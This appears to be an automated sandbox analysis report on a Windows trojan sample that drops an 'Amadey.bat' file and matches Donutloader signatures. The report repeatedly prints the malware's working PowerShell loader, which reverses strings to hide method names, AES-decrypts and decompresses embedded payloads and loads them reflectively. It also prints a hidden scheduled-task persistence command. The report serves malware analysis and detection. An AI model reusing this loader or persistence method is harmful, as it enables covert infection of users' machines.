$Hexfg) { if ($XqpWb.StartsWith(':: ')) { $QgDIl=$XqpWb.Substring(3); break; }}$payloads_var=[string[]]$QgDIl.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vgTuuGykaNIh9YHZdnC5Etwdm0+AKH40IGDiJn6heLQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gQ/PRzSPw/sfJ7E+XuUWrA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vdeGA=New-Object System.IO.MemoryStream(,$param_var); $adrDx=New-Object System.IO.MemoryStream; $Hvzlb=New-Object System.IO.Compression.GZipStream($vdeGA, [IO.Compression.CompressionMode]::Decompress); $Hvzlb.CopyTo($adrDx); $Hvzlb.Dispose(); $vdeGA.Dispose(); $adrDx.Dispose(); $adrDx.ToArray();}function execute_function($param_var,$param2_var){ $HMqcz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ysWQp=$HMqcz.EntryPoint; $ysWQp.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\AppData\Roaming\startup_str_958.bat';$Hexfg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Roaming\startup_str_958.bat').Split([Environment]::NewLine);foreach ($XqpWb in $Hexfg) { if ($XqpWb.StartsWith(':: ')) { $QgDIl=$XqpWb.Substring(3); break; }}$payloads_var=[string[]]$QgDIl.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Code function: 0_2_00A27AAF: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW, 0_2_00A27AAF
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Code function: 0_2_00A292C6 0_2_00A292C6
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Code function: 0_2_00A37DDC 0_2_00A37DDC
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Code function: 0_2_00A35011 0_2_00A35011
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Code function: 0_2_00A462A8 0_2_00A462A8
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Code function: 0_2_00A35282 0_2_00A35282
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Code function: 0_2_00A302F7 0_2_00A302F7
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Code function: 0_2_00A38253 0_2_00A38253
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Code function: 0_2_00A313FD 0_2_00A313FD
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Code function: 0_2_00A464D7 0_2_00A464D7
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Code function: 0_2_00A3742E 0_2_00A3742E
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Code function: 0_2_00A355B0 0_2_00A355B0
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Code function: 0_2_00A4E600 0_2_00A4E600
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Code function: 0_2_00A307A7 0_2_00A307A7
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Code function: 0_2_00A388AF 0_2_00A388AF
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Code function: 0_2_00A2D833 0_2_00A2D833
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Code function: 0_2_00A2395A 0_2_00A2395A
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Code function: 0_2_00A4EAAE 0_2_00A4EAAE
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Code function: 0_2_00A24A8E 0_2_00A24A8E
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Code function: 0_2_00A52BB4 0_2_00A52BB4
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Code function: 0_2_00A2FCCC 0_2_00A2FCCC
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Code function: 0_2_00A22EB6 0_2_00A22EB6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_06E04BD0 4_2_06E04BD0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_06E016CD 4_2_06E016CD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_06E01FAD 4_2_06E01FAD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_06E0304D 4_2_06E0304D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_06E031E7 4_2_06E031E7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_02F4C550 5_2_02F4C550
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_02F4D6BD 5_2_02F4D6BD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_02F4C528 5_2_02F4C528
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_02F49CD0 5_2_02F49CD0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_08616070 5_2_08616070
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_0861407A 5_2_0861407A
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Code function: String function: 00A3FFD0 appears 56 times
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Code function: String function: 00A407A0 appears 31 times
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Code function: String function: 00A3FEFC appears 42 times
Source: jcgLYlM4dg.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 0000000B.00000002.3308756546.0000000008971000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0000000E.00000002.2232648300.000000000935E000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0000000E.00000002.2214765602.00000000081D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0000000E.00000002.2223463037.00000000091DA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 4.2.powershell.exe.609a748.0.raw.unpack, SdUDpawKkufvFwUCPBjE.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.powershell.exe.5ffa728.1.raw.unpack, SdUDpawKkufvFwUCPBjE.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.powershell.exe.a6a0000.5.raw.unpack, SdUDpawKkufvFwUCPBjE.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.powershell.exe.5f826e8.2.raw.unpack, SdUDpawKkufvFwUCPBjE.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 11.2.powershell.exe.6fa73a0.0.raw.unpack, SdUDpawKkufvFwUCPBjE.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 11.2.powershell.exe.70473c0.2.raw.unpack, SdUDpawKkufvFwUCPBjE.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 11.2.powershell.exe.6f0f6e0.1.raw.unpack, SdUDpawKkufvFwUCPBjE.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 14.2.powershell.exe.64874c0.2.raw.unpack, SdUDpawKkufvFwUCPBjE.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 14.2.powershell.exe.634f7e0.0.raw.unpack, SdUDpawKkufvFwUCPBjE.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 14.2.powershell.exe.63e74a0.1.raw.unpack, SdUDpawKkufvFwUCPBjE.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.powershell.exe.5ffa728.1.raw.unpack, SdUDpawKkufvFwUCPBjE.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 4.2.powershell.exe.5ffa728.1.raw.unpack, SdUDpawKkufvFwUCPBjE.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 11.2.powershell.exe.70473c0.2.raw.unpack, SdUDpawKkufvFwUCPBjE.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 11.2.powershell.exe.70473c0.2.raw.unpack, SdUDpawKkufvFwUCPBjE.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 11.2.powershell.exe.6f0f6e0.1.raw.unpack, SdUDpawKkufvFwUCPBjE.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 11.2.powershell.exe.6f0f6e0.1.raw.unpack, SdUDpawKkufvFwUCPBjE.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 11.2.powershell.exe.6fa73a0.0.raw.unpack, SdUDpawKkufvFwUCPBjE.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 11.2.powershell.exe.6fa73a0.0.raw.unpack, SdUDpawKkufvFwUCPBjE.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 4.2.powershell.exe.609a748.0.raw.unpack, SdUDpawKkufvFwUCPBjE.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 4.2.powershell.exe.609a748.0.raw.unpack, SdUDpawKkufvFwUCPBjE.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 4.2.powershell.exe.a6a0000.5.raw.unpack, SdUDpawKkufvFwUCPBjE.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 4.2.powershell.exe.a6a0000.5.raw.unpack, SdUDpawKkufvFwUCPBjE.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 4.2.powershell.exe.5f826e8.2.raw.unpack, SdUDpawKkufvFwUCPBjE.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 4.2.powershell.exe.5f826e8.2.raw.unpack, SdUDpawKkufvFwUCPBjE.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 14.2.powershell.exe.63e74a0.1.raw.unpack, SdUDpawKkufvFwUCPBjE.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 14.2.powershell.exe.63e74a0.1.raw.unpack, SdUDpawKkufvFwUCPBjE.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 14.2.powershell.exe.634f7e0.0.raw.unpack, SdUDpawKkufvFwUCPBjE.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 14.2.powershell.exe.634f7e0.0.raw.unpack, SdUDpawKkufvFwUCPBjE.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 14.2.powershell.exe.64874c0.2.raw.unpack, SdUDpawKkufvFwUCPBjE.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 14.2.powershell.exe.64874c0.2.raw.unpack, SdUDpawKkufvFwUCPBjE.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winEXE@25/15@1/1
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Code function: 0_2_00A27727 GetLastError,FormatMessageW, 0_2_00A27727
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Code function: 0_2_00A3B6D2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree, 0_2_00A3B6D2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\startup_str_958.vbs
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3808:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4124:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1684:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3180:120:WilError_03
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\Amadey.bat" "
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_958_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\startup_str_958.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Command line argument: sfxname 0_2_00A3F05C
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Command line argument: sfxstime 0_2_00A3F05C
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Command line argument: STARTDLG 0_2_00A3F05C
Source: jcgLYlM4dg.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe File read: C:\Windows\win.ini
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: jcgLYlM4dg.exe ReversingLabs: Detection: 26%
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe File read: C:\Users\user\Desktop\jcgLYlM4dg.exe
Source: unknown Process created: C:\Users\user\Desktop\jcgLYlM4dg.exe "C:\Users\user\Desktop\jcgLYlM4dg.exe"
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\Amadey.bat" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vgTuuGykaNIh9YHZdnC5Etwdm0+AKH40IGDiJn6heLQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gQ/PRzSPw/sfJ7E+XuUWrA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vdeGA=New-Object System.IO.MemoryStream(,$param_var); $adrDx=New-Object System.IO.MemoryStream; $Hvzlb=New-Object System.IO.Compression.GZipStream($vdeGA, [IO.Compression.CompressionMode]::Decompress); $Hvzlb.CopyTo($adrDx); $Hvzlb.Dispose(); $vdeGA.Dispose(); $adrDx.Dispose(); $adrDx.ToArray();}function execute_function($param_var,$param2_var){ $HMqcz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ysWQp=$HMqcz.EntryPoint; $ysWQp.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\AppData\Local\Temp\RarSFX0\Amadey.bat';$Hexfg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Local\Temp\RarSFX0\Amadey.bat').Split([Environment]::NewLine);foreach ($XqpWb in $Hexfg) { if ($XqpWb.StartsWith(':: ')) { $QgDIl=$XqpWb.Substring(3); break; }}$payloads_var=[string[]]$QgDIl.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_958_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\startup_str_958.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\startup_str_958.vbs"
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\startup_str_958.vbs"
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\startup_str_958.bat" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vgTuuGykaNIh9YHZdnC5Etwdm0+AKH40IGDiJn6heLQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gQ/PRzSPw/sfJ7E+XuUWrA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vdeGA=New-Object System.IO.MemoryStream(,$param_var); $adrDx=New-Object System.IO.MemoryStream; $Hvzlb=New-Object System.IO.Compression.GZipStream($vdeGA, [IO.Compression.CompressionMode]::Decompress); $Hvzlb.CopyTo($adrDx); $Hvzlb.Dispose(); $vdeGA.Dispose(); $adrDx.Dispose(); $adrDx.ToArray();}function execute_function($param_var,$param2_var){ $HMqcz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ysWQp=$HMqcz.EntryPoint; $ysWQp.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\AppData\Roaming\startup_str_958.bat';$Hexfg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Roaming\startup_str_958.bat').Split([Environment]::NewLine);foreach ($XqpWb in $Hexfg) { if ($XqpWb.StartsWith(':: ')) { $QgDIl=$XqpWb.Substring(3); break; }}$payloads_var=[string[]]$QgDIl.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\startup_str_958.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vgTuuGykaNIh9YHZdnC5Etwdm0+AKH40IGDiJn6heLQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gQ/PRzSPw/sfJ7E+XuUWrA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vdeGA=New-Object System.IO.MemoryStream(,$param_var); $adrDx=New-Object System.IO.MemoryStream; $Hvzlb=New-Object System.IO.Compression.GZipStream($vdeGA, [IO.Compression.CompressionMode]::Decompress); $Hvzlb.CopyTo($adrDx); $Hvzlb.Dispose(); $vdeGA.Dispose(); $adrDx.Dispose(); $adrDx.ToArray();}function execute_function($param_var,$param2_var){ $HMqcz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ysWQp=$HMqcz.EntryPoint; $ysWQp.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\AppData\Roaming\startup_str_958.bat';$Hexfg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Roaming\startup_str_958.bat').Split([Environment]::NewLine);foreach ($XqpWb in $Hexfg) { if ($XqpWb.StartsWith(':: ')) { $QgDIl=$XqpWb.Substring(3); break; }}$payloads_var=[string[]]$QgDIl.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\Amadey.bat" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vgTuuGykaNIh9YHZdnC5Etwdm0+AKH40IGDiJn6heLQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gQ/PRzSPw/sfJ7E+XuUWrA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vdeGA=New-Object System.IO.MemoryStream(,$param_var); $adrDx=New-Object System.IO.MemoryStream; $Hvzlb=New-Object System.IO.Compression.GZipStream($vdeGA, [IO.Compression.CompressionMode]::Decompress); $Hvzlb.CopyTo($adrDx); $Hvzlb.Dispose(); $vdeGA.Dispose(); $adrDx.Dispose(); $adrDx.ToArray();}function execute_function($param_var,$param2_var){ $HMqcz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ysWQp=$HMqcz.EntryPoint; $ysWQp.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\AppData\Local\Temp\RarSFX0\Amadey.bat';$Hexfg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Local\Temp\RarSFX0\Amadey.bat').Split([Environment]::NewLine);foreach ($XqpWb in $Hexfg) { if ($XqpWb.StartsWith(':: ')) { $QgDIl=$XqpWb.Substring(3); break; }}$payloads_var=[string[]]$QgDIl.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_958_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\startup_str_958.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\startup_str_958.vbs"
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\startup_str_958.bat" "
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\startup_str_958.bat" "
